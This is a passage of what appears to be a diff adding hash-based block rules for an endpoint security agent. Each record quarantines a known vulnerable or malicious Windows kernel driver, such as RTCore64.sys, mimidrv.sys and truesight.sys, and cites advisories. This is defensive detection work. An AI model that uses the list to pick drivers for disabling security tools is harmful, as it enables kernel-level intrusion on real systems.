+ "value": "c13745de817eb38a092524cd3dae805c8fbde967e635e485243782db955508cc",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eae4ee15-3638-5cbd-955f-7fa122f9dd53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978458Z",
+ "creation_date": "2026-03-23T11:45:29.978460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "959860cea7a720811a960e28e0318c470948d96ab3ba3312d20fea0f24bc0979",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb0856c4-59dc-5575-a9dc-02ab0f91c1e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144800Z",
+ "creation_date": "2026-03-23T11:45:32.144803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144809Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d5e8700a434838eb63a0573178b4291f07a9d96dabfb4ead40253a3cd9edefd",
+ "comment": "Vulnerable Kernel Driver (aka 
ViveRRAudio.sys) [https://www.loldrivers.io/drivers/4cb95b41-43b4-4806-b536-ae5fd8c76b0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb0a86ab-4216-5ddd-90c3-5e84519d3022",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979446Z",
+ "creation_date": "2026-03-23T11:45:29.979448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6661320f779337b95bbbe1943ee64afb2101c92f92f3d1571c1bf4201c38c724",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb11ae03-395c-5eba-bb9f-1d9403a90a34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825651Z",
+ "creation_date": "2026-03-23T11:45:30.825653Z",
+ "enabled": true,
+ 
"block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825659Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8404e44c1313e7d04dc89fd5e565f27696edb211da48992a843da5bb79eeef17",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb1484cf-c71e-5a2d-87fd-bf91c7397363",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985162Z",
+ "creation_date": "2026-03-23T11:45:29.985164Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e0eb0811a7cf1bdaf29d3d2cab373ca51eb8d8b58889ab7728e2d3aed244abe",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb1e05ef-f6e0-50e6-9534-544e7485ce8f",
+ "test_maturity_current_count": 0,
+ 
"test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460494Z",
+ "creation_date": "2026-03-23T11:45:30.460497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f48f31bf9c6abbd44124b66bce2ab1200176e31ef1e901733761f2b5ceb60fb2",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb228c42-27b2-5d68-b9a7-4a2893b28e01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458344Z",
+ "creation_date": "2026-03-23T11:45:30.458347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ 
"rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "410d79a49c02da50f4567166d5acef977b5dbc3aafb67522939bf902e65596a5",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb2e91a7-b6ac-59d2-966c-2781a01d40a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498658Z",
+ "creation_date": "2026-03-23T11:45:31.498661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498668Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a87819c0f9bc3a1c591d04a3d0bc08ba7275d8c85e59681a6bff4083fe91bd6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb30bdf3-2723-5cc7-8ec5-e450a07ac490",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ 
"rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150089Z",
+ "creation_date": "2026-03-23T11:45:31.150091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a66de0bc76312ea46da3e5eda7fe9053ffd14a24a587baddafbdf487c85da68b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb48d59c-3700-5231-9d53-30f1c02c0e4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819244Z",
+ "creation_date": "2026-03-23T11:45:31.819247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d818b61ad6877c1e82c4ac32b86c2da42990919b1c61b068e279c8b5b46ffc4c",
+ "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb581438-27f2-5038-9bf8-5009f963cc65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480868Z",
+ "creation_date": "2026-03-23T11:45:31.480886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480893Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e03dc0423f91a1d8b7832b10e87e44d89c3533bc5dd09fcbc8581cec881aa028",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb5fbdec-1845-501b-8519-86903bb30a58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470698Z",
+ "creation_date": "2026-03-23T11:45:30.470701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa659944a59430edc6162b285d0fa7b6fbfd28b9057f7286eee127888431844e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eb687ac1-11a1-53ce-96ca-db9b29f7fb52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141183Z",
+ "creation_date": "2026-03-23T11:45:31.141185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89de85cf244a5dc4591e4f733d8e722f68673b74ebdfafd674bf10f84c9a7b15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eb6922d5-90a0-51a2-b4c6-3fe8d9b4a31c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614489Z", + "creation_date": "2026-03-23T11:45:29.614491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eb710708-e0bc-5b8f-8699-2efb84b86cef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821559Z", + "creation_date": "2026-03-23T11:45:31.821562Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b4ec8dfdc14be119b69341a52de33772cbc2efb1078dbdeacdcd35c86356d3d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eb7efdc6-cd7b-526b-8f95-128064b997a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827716Z", + "creation_date": "2026-03-23T11:45:30.827718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c67fd4bf9578eb529dd8c4fe6681e1b4a6f5376036aada2e4db6a57db5246ea0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eb80ffef-805b-58d3-a664-e37e62efe32f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476585Z", + "creation_date": "2026-03-23T11:45:30.476589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476598Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83e993691aa4f5f599dddd1fab2bc3e0791587c9e93eeb9e405c130922096343", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eb8116ff-b09d-5c0a-b51c-ada5dc6b8bc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606280Z", + "creation_date": "2026-03-23T11:45:29.606284Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606292Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7fef94e329bd9b66b281539265f989313356cbd9c345df9e670e9c4b6e0edce", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eb8526a5-96ba-527f-a07c-7a15ee8a3e8f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832816Z", + "creation_date": "2026-03-23T11:45:30.832818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832824Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc49b67101f8ee7db2604bdb42d9c265076e60bd8c73b5d510c4b61f227d7ab5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eba34f89-2e14-5e7b-a005-04b4439f7638", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818923Z", + "creation_date": "2026-03-23T11:45:30.818925Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c20d10857c37d8ed9151fa95f6bf12f99ef2c0bea36eed2370a1f4da7737951", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ebb05a35-351d-52a1-a7ba-3cf41f860896", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468139Z", + "creation_date": "2026-03-23T11:45:30.468143Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468151Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8bec85d128eb0444f10fc89b95b2c6b84a8d0405cb0a6dbc30cff8ea4c0ca043", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ebb3d61c-1806-52db-9594-167f493594a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485353Z", + "creation_date": "2026-03-23T11:45:31.485356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485366Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "492ae424ec172ebea9d26f0f67a479084d5cef2d9390474003d49941f8a2abe7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ebde7747-3a7f-5ecd-b680-5dfcd6287cf8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490661Z", + "creation_date": 
